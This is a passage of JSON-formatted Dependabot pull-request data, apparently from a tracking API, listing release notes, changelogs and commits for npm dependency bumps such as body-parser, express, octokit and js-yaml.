CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@tootallnate/once`\n\nUpdates `body-parser` from 1.19.0 to 1.20.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/releases\"\u003ebody-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.20.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove redundant depth check by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/538\"\u003eexpressjs/body-parser#538\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js v23 by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/553\"\u003eexpressjs/body-parser#553\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: restore CI for 1.x branch by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/665\"\u003eexpressjs/body-parser#665\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@^6.14.0 by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/664\"\u003eexpressjs/body-parser#664\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation and update certain dependencies by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/668\"\u003eexpressjs/body-parser#668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: remove SECURITY.md by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/669\"\u003eexpressjs/body-parser#669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add CodeQL (SAST) by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/670\"\u003eexpressjs/body-parser#670\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.4 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/672\"\u003eexpressjs/body-parser#672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eImportant\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIMPORTANT:\u003c/strong\u003e The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e). \u003ca href=\"https://github.com/expressjs/body-parser/blob/17529513673e39ba79886a7ce3363320cf1c0c50/README.md#depth\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: add support for OSSF scorecard reporting by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: fix errors in ci github action for node 8 and 9 by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/523\"\u003eexpressjs/body-parser#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pin to node@22.4.1 by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/527\"\u003eexpressjs/body-parser#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.12.3 by \u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OSSF Scorecard badge by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinter by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.3 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/535\"\u003eexpressjs/body-parser#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.2...1.20.3\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.2...1.20.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.20.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.11.0\u003c/li\u003e\n\u003cli\u003eperf: remove unnecessary object clone\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/blob/master/HISTORY.md\"\u003ebody-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.20.4 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@~6.14.0\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: http-errors@~2.0.1\u003c/li\u003e\n\u003cli\u003edeps: raw-body@~2.5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.3 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.2 / 2023-02-21\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.1 / 2022-10-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.11.0\u003c/li\u003e\n\u003cli\u003eperf: remove unnecessary object clone\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.0 / 2022-04-02\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix error message for json parse whitespace in \u003ccode\u003estrict\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix internal error when inflated body exceeds limit\u003c/li\u003e\n\u003cli\u003ePrevent loss of async hooks context\u003c/li\u003e\n\u003cli\u003ePrevent hanging when request already read\u003c/li\u003e\n\u003cli\u003edeps: depd@2.0.0\n\u003cul\u003e\n\u003cli\u003eReplace internal \u003ccode\u003eeval\u003c/code\u003e usage with \u003ccode\u003eFunction\u003c/code\u003e constructor\u003c/li\u003e\n\u003cli\u003eUse instance methods on \u003ccode\u003eprocess\u003c/code\u003e to check for listeners\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: http-errors@2.0.0\n\u003cul\u003e\n\u003cli\u003edeps: depd@2.0.0\u003c/li\u003e\n\u003cli\u003edeps: statuses@2.0.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: on-finished@2.4.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.10.3\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.1\n\u003cul\u003e\n\u003cli\u003edeps: http-errors@2.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.19.2 / 2022-02-15\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/7db202cac84a001e6566c2dc6516b44db98beff3\"\u003e\u003ccode\u003e7db202c\u003c/code\u003e\u003c/a\u003e 1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/d8f8adb898676dfdf997b4455e5f9b689b53e989\"\u003e\u003ccode\u003ed8f8adb\u003c/code\u003e\u003c/a\u003e ci: add CodeQL (SAST) (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6d133c19b3e7c0bb8301959ca1dba283d23d23c3\"\u003e\u003ccode\u003e6d133c1\u003c/code\u003e\u003c/a\u003e chore: remove SECURITY.md (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/669\"\u003e#669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/fcd15355041ada6f37288dd13858d50429016b66\"\u003e\u003ccode\u003efcd1535\u003c/code\u003e\u003c/a\u003e deps: use tilde notation and update certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/668\"\u003e#668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ec5fa290d25d85e0049757e240249072331eaee6\"\u003e\u003ccode\u003eec5fa29\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/664\"\u003e#664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ffb95c12c7785ec6d3852ce46b8711ac74009252\"\u003e\u003ccode\u003effb95c1\u003c/code\u003e\u003c/a\u003e ci: restore CI for 1.x branch (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/665\"\u003e#665\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/48a5f074a4db07066087ed8b6ff641825c9c03cf\"\u003e\u003ccode\u003e48a5f07\u003c/code\u003e\u003c/a\u003e ci: add support for Node.js v23 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/553\"\u003e#553\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/f20f6adc7118cbf973e927d34bc0bbf2ff177459\"\u003e\u003ccode\u003ef20f6ad\u003c/code\u003e\u003c/a\u003e Remove redundant depth check (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/538\"\u003e#538\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/17529513673e39ba79886a7ce3363320cf1c0c50\"\u003e\u003ccode\u003e1752951\u003c/code\u003e\u003c/a\u003e 1.20.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/39744cfe2ac4fb37a19ed7c43e3a74332f428e17\"\u003e\u003ccode\u003e39744cf\u003c/code\u003e\u003c/a\u003e chore: linter (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.19.0...1.20.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ulisesgascon\"\u003eulisesgascon\u003c/a\u003e, a new releaser for body-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.17.1 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li...\n\n_Description has been truncated_","html_url":"https://github.com/SherfeyInv/updater-action/pull/38","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/SherfeyInv%2Fupdater-action/issues/38","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/38/packages"},{"uuid":"4202847457","node_id":"PR_kwDOR14qvM7P5n7m","number":10,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 10 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-04T04:03:40.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-04T01:09:06.000Z","updated_at":"2026-04-04T04:03:40.000Z","time_to_close":10474,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":10,"packages":[{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"@babel/traverse","old_version":"7.21.5","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"flatted","old_version":"3.2.7","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 8 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.21.5` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.7` | `3.4.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n\n\nUpdates `js-yaml` from 4.1.0 to 